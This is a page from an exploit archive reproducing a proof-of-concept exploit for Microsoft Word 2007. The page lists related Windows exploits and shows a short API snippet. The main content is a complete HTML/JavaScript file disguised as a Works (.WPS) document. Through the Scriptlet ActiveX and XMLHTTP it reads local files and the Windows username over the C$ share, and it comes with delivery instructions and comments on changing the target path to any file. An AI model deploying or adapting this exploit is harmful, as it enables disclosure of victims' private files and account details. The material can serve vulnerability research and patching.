Menu

Search for hundreds of thousands of exploits

"Microsoft Word 2007 (x86) - Information Disclosure"

Author

"Eduardo Braun Prado"

Platform

windows

Release date

2017-09-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
Title: MS Office Word Information Disclosure Vulnerability

Date: September 30th, 2017.

Author: Eduardo Braun Prado

Vendor Homepage: http://www.microsoft.com/

Software Link: https://products.office.com/

Version: 2007  32-bits (x86)

Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)

CVE: N/A


Description:

MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..

The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:

c:\users\%username%\AppData\Local\Microsoft\Windows


Instructions:

a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.

b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.

c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.

Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.




-------------Disclose_File.WPS------------------------------------------------------------
<html><body>

<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->

<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>


<script language=javascript>


var loc = document.location.href.toLowerCase();

var locNoProtocol = loc.substring(8,loc.length);

var b1 = locNoProtocol.indexOf(String.fromCharCode(47));

var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);

var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);

var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);

var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced

// through the default "C$" share.



var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";

// change the above path to match another file you wish to grab the contents.


var t = loc.indexOf("c:");   // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
var tr = loc.indexOf("c$");

if (t != -1)
{

var ns = loc.substring(t+2,loc.length);



document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');

}

else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",fileToDisclose,0);
x.Send();
fileContents = x.ResponseText;

alert(fileContents);

}

</script>

</body>

</html>

-------------------------------------------------------------------------------------------------------------------

Vulnerable: MS Office 2007

MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.

Tested on: Any Windows version that suppors Office 2007.

Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
Release Date Title Type Platform Author
2019-09-16 "docPrint Pro 8.0 - SEH Buffer Overflow" local windows "Connor McGarr"
2019-09-16 "AppXSvc - Privilege Escalation" local windows "Gabor Seljan"
2019-09-06 "Windows NTFS - Privileged File Access Enumeration" local windows hyp3rlinx
2019-09-13 "Folder Lock 7.7.9 - Denial of Service" dos windows Achilles
2019-09-12 "Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts" dos windows "Google Security Research"
2019-09-12 "Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts" dos windows "Google Security Research"
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)" local windows Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)" local windows Metasploit
2019-09-02 "Kaseya VSA agent 9.5 - Privilege Escalation" local windows NF
2019-09-02 "ChaosPro 3.1 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-09-02 "ChaosPro 2.1 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-09-02 "ChaosPro 2.0 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-08-30 "VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service" dos windows "James Chamberlain"
2019-08-30 "Asus Precision TouchPad 11.0.0.25 - Denial of Service" dos windows "Athanasios Tserpelis"
2019-08-30 "Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service" dos windows "Mohan Ravichandran_ Snazzy Sanoj"
2019-08-30 "SQL Server Password Changer 1.90 - Denial of Service" dos windows "Velayutham Selvaraj_ Praveen Thiyagarayam"
2019-08-28 "Outlook Password Recovery 2.10 - Denial of Service" dos windows "Velayutham Selvaraj_ Praveen Thiyagarayam"
2019-08-26 "Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass" local windows "Google Security Research"
2019-08-26 "LSoft ListServ < 16.5-2018a - Cross-Site Scripting" webapps windows MTK
2019-08-19 "RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service" dos windows Achilles
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
Release Date Title Type Platform Author
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-01-22 "Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution" remote windows "Eduardo Braun Prado"
2016-05-12 "Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)" remote windows "Eduardo Braun Prado"
2015-12-09 "Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File" remote windows "Eduardo Braun Prado"
2017-09-30 "Microsoft Word 2007 (x86) - Information Disclosure" local windows "Eduardo Braun Prado"
2015-07-20 "Microsoft Word - Local Machine Zone Code Execution (MS15-022)" local windows "Eduardo Braun Prado"
2017-09-30 "Microsoft Excel - OLE Arbitrary Code Execution" dos windows "Eduardo Braun Prado"
2017-09-28 "Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution" dos windows "Eduardo Braun Prado"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/42930/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/42930/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/42930/9796/microsoft-word-2007-x86-information-disclosure/download/", "exploit_id": "42930", "exploit_description": "\"Microsoft Word 2007 (x86) - Information Disclosure\"", "exploit_date": "2017-09-30", "exploit_author": "\"Eduardo Braun Prado\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse